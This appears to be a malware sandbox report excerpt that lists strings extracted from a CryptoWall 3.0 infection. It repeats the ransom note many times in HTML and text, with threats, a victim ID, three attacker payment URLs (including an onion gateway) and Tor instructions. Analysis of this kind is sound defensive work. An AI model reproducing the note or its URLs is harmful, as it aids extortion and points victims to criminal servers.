other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html77.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for 
other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt235.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html124.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html242.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html263.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt185.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt45.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt421.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html191.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt18.2.dr String found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html11.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for 
other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html32.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for 
other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html19.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for 
other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html62.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for 
other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt171.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html121.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt396.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html314.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching 
for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
